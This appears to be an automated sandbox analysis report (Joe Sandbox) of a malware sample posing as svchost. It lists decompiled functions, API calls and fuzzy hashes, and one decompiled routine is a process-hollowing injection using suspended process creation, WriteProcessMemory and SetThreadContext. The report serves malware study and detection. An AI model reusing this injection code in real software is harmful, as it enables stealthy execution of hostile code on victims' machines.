                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00126b08

                                                                                APIs
                                                                                • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,74CF81D0,?,?,?,?,00129A60,?,?,00129E9D), ref: 00126A7D
                                                                                • GetDiskFreeSpaceA.KERNEL32(00129E9D,00129A60,?,?,?,001322F8,?,?,?,00129A60,?,?,00129E9D), ref: 00126ABB
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,00129A60,?,?,00129E9D), ref: 00126B40
                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00129A60,?,?,00129E9D), ref: 00126B4E
                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00129A60,?,?,00129E9D), ref: 00126B5F
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,00129A60,?,?,00129E9D), ref: 00126B6F
                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00129A60,?,?,00129E9D), ref: 00126B7D
                                                                                • DeleteFileA.KERNEL32(?,?,?,?,?,?,?,?,00129A60,?,?,00129E9D), ref: 00126B80
                                                                                • GetLastError.KERNEL32(?,?,?,00129A60,?,?,00129E9D,?,?,?,?,?,00129E9D,?,00000022,?), ref: 00126B96
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseErrorHandleLast$File$CreateDeleteDiskFreeSpace
                                                                                • String ID:
                                                                                • API String ID: 3188212458-0
                                                                                • Opcode ID: daf6007789c53ba79547616e50a8f4fdf48d8187a967a2f091540df1026cd9ca
                                                                                • Instruction ID: 2964fee6bfff7d439d966c14a182d76e6bcc4aaf9f3c1c740bfdd8a0ed9a1af7
                                                                                • Opcode Fuzzy Hash: daf6007789c53ba79547616e50a8f4fdf48d8187a967a2f091540df1026cd9ca
                                                                                • Instruction Fuzzy Hash: 1A31E372A0021DFFDF01AFA4AD85BDE7FB9EB58340F144066F251E7691D73099A48B60
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00126F5F Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 89COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 93%
                                                                                			E00126F5F(long _a4, long _a8) {
				void* _v8;
				long _v12;
				union _SID_NAME_USE _v16;
				void _v84;
				char _v212;
				CHAR* _t36;
				void* _t53;
				intOrPtr* _t54;
				char _t62;
				void* _t65;
				char* _t66;
				intOrPtr _t67;
				CHAR* _t68;
				void* _t69;

				_t68 = _a4;
				 *_t68 = 0;
				if(GetUserNameA(_t68,  &_a8) == 0) {
					return 0;
				}
				_t36 = _t68;
				_t66 =  &(_t36[1]);
				do {
					_t62 =  *_t36;
					_t36 =  &(_t36[1]);
				} while (_t62 != 0);
				_a8 = _t36 - _t66;
				_a4 = 0x7c;
				_v12 = 0x80;
				if(LookupAccountNameA(0, _t68,  &_v84,  &_a4,  &_v212,  &_v12,  &_v16) == 0) {
					L8:
					_a8 = _a8 + wsprintfA( &(_t68[_a8]), "/%d", E00126EDD());
					return _a8;
				}
				E0012EF00( &(_t68[_a8]), "/");
				_a8 = _a8 + 1;
				_push( &_v8);
				_t53 =  &_v84;
				_push(_t53);
				L0012F4AA();
				if(_t53 == 0) {
					goto L8;
				}
				_t54 = _v8;
				_t20 = _t54 + 1; // 0x121
				_t65 = _t20;
				do {
					_t67 =  *_t54;
					_t54 = _t54 + 1;
				} while (_t67 != 0);
				_a4 = _t54 - _t65;
				E0012EE08( &(_t68[_a8]), _v8, _t54 - _t65 + 1);
				_a8 = _a8 + _a4;
				_t69 = _t69 + 0xc;
				LocalFree(_v8);
				goto L8;
			}

















                                                                                0x00126f6c
                                                                                0x00126f77
                                                                                0x00126f82
                                                                                0x00000000
                                                                                0x00127047
                                                                                0x00126f88
                                                                                0x00126f8a
                                                                                0x00126f8d
                                                                                0x00126f8d
                                                                                0x00126f8f
                                                                                0x00126f90
                                                                                0x00126f96
                                                                                0x00126fb3
                                                                                0x00126fba
                                                                                0x00126fc9
                                                                                0x00127025
                                                                                0x0012703f
                                                                                0x00000000
                                                                                0x00127042
                                                                                0x00126fd6
                                                                                0x00126fdb
                                                                                0x00126fe3
                                                                                0x00126fe4
                                                                                0x00126fe7
                                                                                0x00126fe8
                                                                                0x00126fef
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00126ff1
                                                                                0x00126ff4
                                                                                0x00126ff4
                                                                                0x00126ff7
                                                                                0x00126ff7
                                                                                0x00126ff9
                                                                                0x00126ffa
                                                                                0x00127000
                                                                                0x0012700e
                                                                                0x00127016
                                                                                0x00127019
                                                                                0x0012701f
                                                                                0x00000000

                                                                                APIs
                                                                                • GetUserNameA.ADVAPI32(?,0012D7C3), ref: 00126F7A
                                                                                • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,0012D7C3), ref: 00126FC1
                                                                                • ConvertSidToStringSidA.ADVAPI32(?,00000120), ref: 00126FE8
                                                                                • LocalFree.KERNEL32(00000120), ref: 0012701F
                                                                                • wsprintfA.USER32 ref: 00127036
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Name$AccountConvertFreeLocalLookupStringUserwsprintf
                                                                                • String ID: /%d$|
                                                                                • API String ID: 676856371-4124749705
                                                                                • Opcode ID: e02feb10db97addcd6e87918c87d3959e113511c9435229cdf937142795f77a0
                                                                                • Instruction ID: 0ab1af1c551a18215732e9f813c318bc05b0cc57ce1f34e291fe9bb2ec58a168
                                                                                • Opcode Fuzzy Hash: e02feb10db97addcd6e87918c87d3959e113511c9435229cdf937142795f77a0
                                                                                • Instruction Fuzzy Hash: 4D313872900218ABDB01DFA8E859ADF7BFCEF09350F048066F819DB141EB34DA188B94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00126CC9 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 84libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 80%
                                                                                			E00126CC9(void* __ecx) {
				_Unknown_base(*)()* _t8;
				CHAR* _t17;
				void* _t18;
				void* _t23;
				char _t25;
				void* _t34;

				_t23 = __ecx;
				if( *0x132e08 != 0) {
					L14:
					return 0x132e08;
				}
				_t8 = GetProcAddress(GetModuleHandleA("kernel32"), "GetSystemWow64DirectoryA");
				if(_t8 == 0) {
					L4:
					if(GetSystemDirectoryA(0x132e08, 0x104) == 0 ||  *0x132e08 == 0) {
						if(GetWindowsDirectoryA(0x132e08, 0x104) == 0 ||  *0x132e08 == 0) {
							E0012EF00(0x132e08, E00122544(0x1322f8, 0x130664, 0xb, 0xe4, 0xc8));
							E0012EE2A(_t23, 0x1322f8, 0, 0x100);
							_t34 = _t34 + 0x28;
						}
						E0012EF1E(0x132e08, E00122544(0x1322f8, 0x130658, 0xb, 0xe4, 0xc8));
						E0012EE2A(_t23, 0x1322f8, 0, 0x100);
					}
					L10:
					_t17 = 0x132e08;
					goto L11;
					L11:
					_t25 =  *_t17;
					_t17 =  &(_t17[1]);
					if(_t25 != 0) {
						goto L11;
					} else {
						_t18 = _t17 - 0x132e09;
						if( *((char*)(_t18 + 0x132e07)) != 0x5c) {
							 *((char*)(_t18 + 0x132e08)) = 0x5c;
							 *((char*)(_t18 + 0x132e09)) = _t25;
						}
						goto L14;
					}
				}
				_push(0x104);
				_push(0x132e08);
				if( *_t8() == 0 ||  *0x132e08 == 0) {
					goto L4;
				} else {
					goto L10;
				}
			}









                                                                                0x00126cc9
                                                                                0x00126cd6
                                                                                0x00126dbe
                                                                                0x00126dc1
                                                                                0x00126dc1
                                                                                0x00126cee
                                                                                0x00126cfb
                                                                                0x00126d12
                                                                                0x00126d1c
                                                                                0x00126d40
                                                                                0x00126d60
                                                                                0x00126d69
                                                                                0x00126d6e
                                                                                0x00126d6e
                                                                                0x00126d86
                                                                                0x00126d8f
                                                                                0x00126d98
                                                                                0x00126d99
                                                                                0x00126d99
                                                                                0x00126d9e
                                                                                0x00126d9f
                                                                                0x00126d9f
                                                                                0x00126da1
                                                                                0x00126da4
                                                                                0x00000000
                                                                                0x00126da6
                                                                                0x00126da6
                                                                                0x00126daf
                                                                                0x00126db1
                                                                                0x00126db8
                                                                                0x00126db8
                                                                                0x00000000
                                                                                0x00126daf
                                                                                0x00126da4
                                                                                0x00126cfd
                                                                                0x00126cfe
                                                                                0x00126d03
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(kernel32,GetSystemWow64DirectoryA,001322F8,000000E4,00126DDC,000000C8), ref: 00126CE7
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00126CEE
                                                                                • GetSystemDirectoryA.KERNEL32 ref: 00126D14
                                                                                • GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 00126D2B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Directory$AddressHandleModuleProcSystemWindows
                                                                                • String ID: C:\Windows\SysWOW64\$GetSystemWow64DirectoryA$kernel32
                                                                                • API String ID: 1082366364-3395550214
                                                                                • Opcode ID: eeaf994e8a8343ca6793c5de614262f03323676576d68076133baed8ffd64b03
                                                                                • Instruction ID: 1755face8c685d0f4009e8c1a7be4ab899859285ac36480fe5f78c596ff296f6
                                                                                • Opcode Fuzzy Hash: eeaf994e8a8343ca6793c5de614262f03323676576d68076133baed8ffd64b03
                                                                                • Instruction Fuzzy Hash: CD212B7174126C7EF72267327C9AFB72ECD8B66750F0C4094F484A60D1D7A988A5C2B5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0012977C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 82threadinjectionprocessCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 82%
                                                                                			E0012977C(void* __ecx, CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				void _v24;
				char _v28;
				struct _STARTUPINFOA _v96;
				struct _CONTEXT _v812;
				void* _t33;

				_t46 = __ecx;
				E0012EE2A(__ecx,  &_v96, 0, 0x44);
				_v96.cb = 0x44;
				if(CreateProcessA(0, _a4, 0, 0, 0, 4, 0, 0,  &_v96,  &_v20) != 0) {
					E0012EE2A(_t46,  &_v812, 0, 0x2cc);
					_v812.ContextFlags = 0x10002;
					if(GetThreadContext(_v20.hThread,  &_v812) != 0) {
						_t33 = E0012637C(_entry_, _v20.hProcess,  &_v28,  &_v24);
						_push(0);
						if(_t33 == 0) {
							L4:
							TerminateProcess(_v20.hProcess, ??);
							goto L1;
						}
						if(WriteProcessMemory(_v20, _v812.Ebx + 8,  &_v24, 4, ??) == 0) {
							goto L3;
						}
						_v812.Eax = _v28;
						if(SetThreadContext(_v20.hThread,  &_v812) == 0) {
							goto L3;
						}
						ResumeThread(_v20.hThread);
						return 1;
					}
					L3:
					_push(0);
					goto L4;
				}
				L1:
				return 0;
			}









                                                                                0x0012977c
                                                                                0x0012978f
                                                                                0x001297a9
                                                                                0x001297b9
                                                                                0x001297cf
                                                                                0x001297e1
                                                                                0x001297f3
                                                                                0x00129811
                                                                                0x00129819
                                                                                0x0012981c
                                                                                0x001297f6
                                                                                0x001297f9
                                                                                0x00000000
                                                                                0x001297f9
                                                                                0x00129839
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012983e
                                                                                0x00129856
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012985b
                                                                                0x00000000
                                                                                0x00129863
                                                                                0x001297f5
                                                                                0x001297f5
                                                                                0x00000000
                                                                                0x001297f5
                                                                                0x001297bb
                                                                                0x00000000

                                                                                APIs
                                                                                • CreateProcessA.KERNEL32(00000000,00129947,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,?,001322F8), ref: 001297B1
                                                                                • GetThreadContext.KERNEL32(?,?,?,?,?,?,?,001322F8), ref: 001297EB
                                                                                • TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,001322F8), ref: 001297F9
                                                                                • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,?,?,?,?,?,?,?,001322F8), ref: 00129831
                                                                                • SetThreadContext.KERNEL32(?,00010002,?,?,?,?,?,?,?,?,?,001322F8), ref: 0012984E
                                                                                • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,001322F8), ref: 0012985B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ProcessThread$Context$CreateMemoryResumeTerminateWrite
                                                                                • String ID: D
                                                                                • API String ID: 2981417381-2746444292
                                                                                • Opcode ID: c07d1000873e769e9a919c037db3921ddcde7a6725ad8a71c7aefb1695757a1a
                                                                                • Instruction ID: 6592f071701bd0a412d43e18a92c65fd6061282944c05be721ad4f9de30f578b
                                                                                • Opcode Fuzzy Hash: c07d1000873e769e9a919c037db3921ddcde7a6725ad8a71c7aefb1695757a1a
                                                                                • Instruction Fuzzy Hash: EB21EB71901229BBDB229FA5EC49EEF7BBCEF09750F400061FA19E1150EB71DA54CBA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0012E8A1 Relevance: 9.2, APIs: 4, Strings: 2, Instructions: 172stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 98%
                                                                                			E0012E8A1(void* __edx, char _a4, CHAR* _a8, CHAR* _a12, CHAR* _a16) {
				CHAR* _v8;
				signed int _v12;
				intOrPtr _v16;
				CHAR* _v20;
				intOrPtr _v24;
				CHAR* _v28;
				CHAR* _v32;
				intOrPtr _v36;
				char _v37;
				char _v52;
				char _v56;
				intOrPtr _t87;
				intOrPtr _t95;
				int _t126;
				void* _t136;
				void* _t138;
				CHAR* _t139;
				void* _t146;
				char _t150;
				void* _t154;
				void* _t158;
				void* _t159;

				_t146 = __edx;
				_v20 = 0;
				E0012DD05();
				_t150 = _a4;
				_t158 = E0012DD84(_t150, _a8);
				_pop(_t138);
				if(_t158 != 0) {
					L2:
					_t16 = _t158 + 0x30; // 0x30
					_v8 = E00122419(_t138, _t16,  *((intOrPtr*)(_t158 + 0x24)), _a12);
					_t21 = lstrlenA(_a12) + 1; // 0x1
					_t136 = _t21;
					_t87 = lstrlenA(_a16) + _t136 + 1;
					_v16 = _t87;
					if(_v8 == 0) {
						_t139 =  *((intOrPtr*)(_t158 + 0x24));
						_v12 = _v12 & 0x00000000;
						_v8 = _t139;
						_t152 = _t139;
					} else {
						_t126 = lstrlenA(_v8);
						_t152 = _v8 - _t136 - _t158 + 0xffffffd0;
						_v12 = _t126 + _t136 + 1;
						_t87 = _v16;
						_v8 = _v8 - _t136 - _t158 + 0xffffffd0;
					}
					if(_v12 == _t87) {
						E0012EE08(_t152 + _t158 + 0x30, _a12, _t136);
						E0012EE08(_t152 + _t136 + _t158 + 0x30, _a16, _v16 - _t136);
						_t77 = _t158 + 0x30; // 0x30
						_t95 = E001224C2(_t77,  *((intOrPtr*)(_t158 + 0x24)), 0);
						if( *((intOrPtr*)(_t158 + 0x20)) != _t95) {
							 *((intOrPtr*)(_t158 + 0x20)) = _t95;
							 *0x1336c0 = 1;
						}
					} else {
						_t41 = _t87 + 0x24; // 0x24
						_t154 = E0012EBCC( *((intOrPtr*)(_t158 + 0x24)) - _v12 + _t41);
						if(_t154 != 0) {
							_t43 = _t158 + 0xc; // 0xc
							E0012EE08(_t154, _t43,  &(_v8[0x24]));
							 *((intOrPtr*)(_t154 + 0x18)) =  *((intOrPtr*)(_t158 + 0x24)) - _v12 + _v16;
							_v20 =  &(_v8[_t154]);
							E0012EE08( &(( &(_v8[_t154]))[0x24]), _a12, _t136);
							E0012EE08( &(_v20[_t136 + 0x24]), _a16, _v16 - _t136);
							E0012EE08( &(_v20[_v16 + 0x24]),  &(( &(_v8[_v12]))[_t158 + 0x30]),  *((intOrPtr*)(_t158 + 0x24)) - _v8 - _v12);
							_t66 = _t154 + 0x24; // 0x24
							 *((intOrPtr*)(_t154 + 0x14)) = E001224C2(_t66,  *((intOrPtr*)(_t154 + 0x18)), 0);
							E0012DF4C( *((intOrPtr*)(_t158 + 0x24)) - _v8 - _v12, _t154);
							E0012EC2E(_t154);
							_v20 = 1;
						}
					}
					L10:
					E0012DD69();
					return _v20;
				}
				_v56 = _t150;
				_v28 = 0;
				_v24 = 3;
				lstrcpynA( &_v52, _a8, 0x10);
				_v37 = 0;
				_v32 = 0;
				_v36 = E001224C2( &_v20, 0, 0);
				E0012DF4C(_t146,  &_v56);
				_t158 = E0012DD84(_t150, _a8);
				_t159 = _t159 + 0x18;
				if(_t158 == 0) {
					goto L10;
				}
				goto L2;
			}

























                                                                                0x0012e8a1
                                                                                0x0012e8ac
                                                                                0x0012e8af
                                                                                0x0012e8b7
                                                                                0x0012e8c0
                                                                                0x0012e8c3
                                                                                0x0012e8c6
                                                                                0x0012e917
                                                                                0x0012e91a
                                                                                0x0012e932
                                                                                0x0012e93a
                                                                                0x0012e93a
                                                                                0x0012e943
                                                                                0x0012e947
                                                                                0x0012e94a
                                                                                0x0012e96a
                                                                                0x0012e96d
                                                                                0x0012e971
                                                                                0x0012e974
                                                                                0x0012e94c
                                                                                0x0012e94f
                                                                                0x0012e95c
                                                                                0x0012e95f
                                                                                0x0012e962
                                                                                0x0012e965
                                                                                0x0012e965
                                                                                0x0012e979
                                                                                0x0012ea3a
                                                                                0x0012ea4f
                                                                                0x0012ea59
                                                                                0x0012ea5d
                                                                                0x0012ea68
                                                                                0x0012ea6a
                                                                                0x0012ea6d
                                                                                0x0012ea6d
                                                                                0x0012e97f
                                                                                0x0012e985
                                                                                0x0012e98f
                                                                                0x0012e994
                                                                                0x0012e9a1
                                                                                0x0012e9a6
                                                                                0x0012e9b8
                                                                                0x0012e9c0
                                                                                0x0012e9c7
                                                                                0x0012e9dd
                                                                                0x0012ea02
                                                                                0x0012ea0c
                                                                                0x0012ea16
                                                                                0x0012ea19
                                                                                0x0012ea22
                                                                                0x0012ea28
                                                                                0x0012ea28
                                                                                0x0012e994
                                                                                0x0012ea77
                                                                                0x0012ea77
                                                                                0x0012ea83
                                                                                0x0012ea83
                                                                                0x0012e8d1
                                                                                0x0012e8d4
                                                                                0x0012e8d7
                                                                                0x0012e8de
                                                                                0x0012e8ea
                                                                                0x0012e8ed
                                                                                0x0012e8f5
                                                                                0x0012e8fc
                                                                                0x0012e90a
                                                                                0x0012e90c
                                                                                0x0012e911
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000

                                                                                APIs
                                                                                  • Part of subcall function 0012DD05: GetTickCount.KERNEL32 ref: 0012DD0F
                                                                                  • Part of subcall function 0012DD05: InterlockedExchange.KERNEL32(001336B4,00000001), ref: 0012DD44
                                                                                  • Part of subcall function 0012DD05: GetCurrentThreadId.KERNEL32 ref: 0012DD53
                                                                                  • Part of subcall function 0012DD84: lstrcmpiA.KERNEL32(80000011,00000000,00000108,80000001,00000000,0012DE62,80000001,80000005,00000108,00000000,000000E4,00000000,?,0012E3A7,000000F0), ref: 0012DDB5
                                                                                • lstrcpynA.KERNEL32(?,00121E84,00000010,localcfg,?,flags_upd,?,?,?,?,?,0012EAAA,?,?), ref: 0012E8DE
                                                                                • lstrlenA.KERNEL32(?,localcfg,?,flags_upd,?,?,?,?,?,0012EAAA,?,?,00000001,?,00121E84,?), ref: 0012E935
                                                                                • lstrlenA.KERNEL32(00000001,?,?,?,?,?,0012EAAA,?,?,00000001,?,00121E84,?,0000000A), ref: 0012E93D
                                                                                • lstrlenA.KERNEL32(00000000,?,?,?,?,?,0012EAAA,?,?,00000001,?,00121E84,?), ref: 0012E94F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrlen$CountCurrentExchangeInterlockedThreadTicklstrcmpilstrcpyn
                                                                                • String ID: flags_upd$localcfg
                                                                                • API String ID: 204374128-3505511081
                                                                                • Opcode ID: d0ca5a2e57bb972bf0ecfc980e7902e68419d1ba45eccb8a4cfc0f0283024942
                                                                                • Instruction ID: ad368cbf21836c29b665a8964e7c8cfbed8d80b95ab5080b9d8fc5f098ad3fb0
                                                                                • Opcode Fuzzy Hash: d0ca5a2e57bb972bf0ecfc980e7902e68419d1ba45eccb8a4cfc0f0283024942
                                                                                • Instruction Fuzzy Hash: 96515E7290021AAFCF01EFE8D985DAEBBF9FF58304F14052AF415A3211D774EA658B50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00126BA7 Relevance: 9.1, APIs: 6, Instructions: 84COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 43%
                                                                                			E00126BA7(CHAR* _a4) {
				long _v8;
				long _v12;
				long _t14;
				int _t19;
				void* _t28;
				void* _t39;

				_push(_t30);
				if(IsBadCodePtr( *0x1330ac) == 0) {
					_push( &_v8);
					_push(0);
					if( *0x1330ac() == 0) {
						_t28 = E0012EBCC(_v8);
						if(_t28 == 0) {
							L7:
							_t14 = 0;
						} else {
							_push( &_v8);
							_push(_t28);
							if( *0x1330ac() == 0) {
								_v12 = 0;
								_t39 = CreateFileA(_a4, 0x40000000, 0, 0, 2, 0x80, 0);
								if(_t39 != 0xffffffff) {
									_t19 = WriteFile(_t39, _t28, _v8,  &_v12, 0);
									_push(_t39);
									if(_t19 != 0) {
										CloseHandle();
										E0012EC2E(_t28);
										_t14 = _v8;
									} else {
										CloseHandle();
										DeleteFileA(_a4);
										goto L9;
									}
								} else {
									L9:
									E0012EC2E(_t28);
									_t14 = 0;
								}
							} else {
								E0012EC2E(_t28);
								goto L7;
							}
						}
					} else {
						_t14 = 0;
					}
					return _t14;
				} else {
					return 0;
				}
			}









                                                                                0x00126bab
                                                                                0x00126bba
                                                                                0x00126bc4
                                                                                0x00126bc7
                                                                                0x00126bd2
                                                                                0x00126be4
                                                                                0x00126be9
                                                                                0x00126c03
                                                                                0x00126c03
                                                                                0x00126beb
                                                                                0x00126bee
                                                                                0x00126bef
                                                                                0x00126bfa
                                                                                0x00126c1a
                                                                                0x00126c23
                                                                                0x00126c28
                                                                                0x00126c3e
                                                                                0x00126c44
                                                                                0x00126c47
                                                                                0x00126c5a
                                                                                0x00126c61
                                                                                0x00126c66
                                                                                0x00126c49
                                                                                0x00126c49
                                                                                0x00126c52
                                                                                0x00000000
                                                                                0x00126c52
                                                                                0x00126c2a
                                                                                0x00126c2a
                                                                                0x00126c2b
                                                                                0x00126c30
                                                                                0x00126c30
                                                                                0x00126bfc
                                                                                0x00126bfd
                                                                                0x00000000
                                                                                0x00126c02
                                                                                0x00126bfa
                                                                                0x00126bd4
                                                                                0x00126bd4
                                                                                0x00126bd4
                                                                                0x00126c6e
                                                                                0x00126bbc
                                                                                0x00126bbf
                                                                                0x00126bbf

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Code
                                                                                • String ID:
                                                                                • API String ID: 3609698214-0
                                                                                • Opcode ID: d93507569a4e509853638147d78581b2d217b23be0402050fa428389ddddfa53
                                                                                • Instruction ID: 80442b52be97dd18010139ad7785c81ad323f68abf62d0211f56e30081cb97a9
                                                                                • Opcode Fuzzy Hash: d93507569a4e509853638147d78581b2d217b23be0402050fa428389ddddfa53
                                                                                • Instruction Fuzzy Hash: 2F219072204125FFDB19ABB0FD89E9F7BACDB497A0B204515F542E1090EB31DE60D674
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00129064 Relevance: 9.1, APIs: 6, Instructions: 83filestringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 63%
                                                                                			E00129064(void* __eflags, void* _a4, CHAR* _a8) {
				long _v8;
				char _v1032;
				signed int _t29;
				signed int _t62;
				void* _t64;

				GetTempPathA(0x400,  &_v1032);
				E00128274( &_v1032);
				_t29 = E0012ECA5();
				_t62 = 9;
				_push(_t29 % _t62);
				_push(E0012ECA5() % _t62);
				_push(E0012ECA5() % _t62);
				_push(E0012ECA5() % _t62);
				_push( &_v1032);
				wsprintfA(_a8, E00122544(0x1322f8,  &E00130794, 0xf, 0xe4, 0xc8));
				E0012EE2A(_t62, 0x1322f8, 0, 0x100);
				_t64 = CreateFileA(_a8, 0x40000000, 0, 0, 2, 0, 0);
				if(_t64 <= 0) {
					return 0;
				}
				WriteFile(_t64, _a4, lstrlenA(_a4),  &_v8, 0);
				CloseHandle(_t64);
				return 1;
			}








                                                                                0x0012907b
                                                                                0x00129088
                                                                                0x0012908e
                                                                                0x00129095
                                                                                0x0012909c
                                                                                0x001290a8
                                                                                0x001290b4
                                                                                0x001290c9
                                                                                0x001290ca
                                                                                0x001290e9
                                                                                0x001290f8
                                                                                0x00129114
                                                                                0x00129118
                                                                                0x00000000
                                                                                0x0012913f
                                                                                0x0012912d
                                                                                0x00129134
                                                                                0x00000000

                                                                                APIs
                                                                                • GetTempPathA.KERNEL32(00000400,?,00000000,001322F8), ref: 0012907B
                                                                                • wsprintfA.USER32 ref: 001290E9
                                                                                • CreateFileA.KERNEL32(001322F8,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0012910E
                                                                                • lstrlenA.KERNEL32(00000000,00000100,00000000), ref: 00129122
                                                                                • WriteFile.KERNEL32(00000000,00000000,00000000), ref: 0012912D
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00129134
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseCreateHandlePathTempWritelstrlenwsprintf
                                                                                • String ID:
                                                                                • API String ID: 2439722600-0
                                                                                • Opcode ID: 36c14b4f63e684f7d72ed56264c37a6e5123ebf96dfafc5c13d55dcb8c26cb91
                                                                                • Instruction ID: 4549582a07ae5b9fbebe9a43813e18076d09f6852bb1cdbb03f2b51055a31baa
                                                                                • Opcode Fuzzy Hash: 36c14b4f63e684f7d72ed56264c37a6e5123ebf96dfafc5c13d55dcb8c26cb91
                                                                                • Instruction Fuzzy Hash: 49119AB26401247BF7257B76EC0AFAF36BDDBD8B00F008065FB0AA5151EB704E619660
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0012DD05 Relevance: 9.0, APIs: 6, Instructions: 34threadsleepCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0012DD05() {
				long _t4;
				long _t10;

				_t10 = GetTickCount();
				while(InterlockedExchange(0x1336b4, 1) != 0) {
					if(GetCurrentThreadId() !=  *0x1336b8) {
						if(GetTickCount() - _t10 >= 0x2710) {
							 *0x1336bc =  *0x1336bc & 0x00000000;
						} else {
							Sleep(0);
							continue;
						}
					}
					L7:
					_t4 = GetCurrentThreadId();
					 *0x1336bc =  *0x1336bc + 1;
					 *0x1336b8 = _t4;
					return _t4;
				}
				goto L7;
			}





                                                                                0x0012dd17
                                                                                0x0012dd41
                                                                                0x0012dd2c
                                                                                0x0012dd37
                                                                                0x0012dd4c
                                                                                0x0012dd39
                                                                                0x0012dd3b
                                                                                0x00000000
                                                                                0x0012dd3b
                                                                                0x0012dd37
                                                                                0x0012dd53
                                                                                0x0012dd53
                                                                                0x0012dd59
                                                                                0x0012dd62
                                                                                0x0012dd68
                                                                                0x0012dd68
                                                                                0x00000000

                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 0012DD0F
                                                                                • GetCurrentThreadId.KERNEL32 ref: 0012DD20
                                                                                • GetTickCount.KERNEL32 ref: 0012DD2E
                                                                                • Sleep.KERNEL32(00000000,?,74CB43E0,?,00000000,0012E538,?,74CB43E0,?,00000000,?,0012A445), ref: 0012DD3B
                                                                                • InterlockedExchange.KERNEL32(001336B4,00000001), ref: 0012DD44
                                                                                • GetCurrentThreadId.KERNEL32 ref: 0012DD53
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
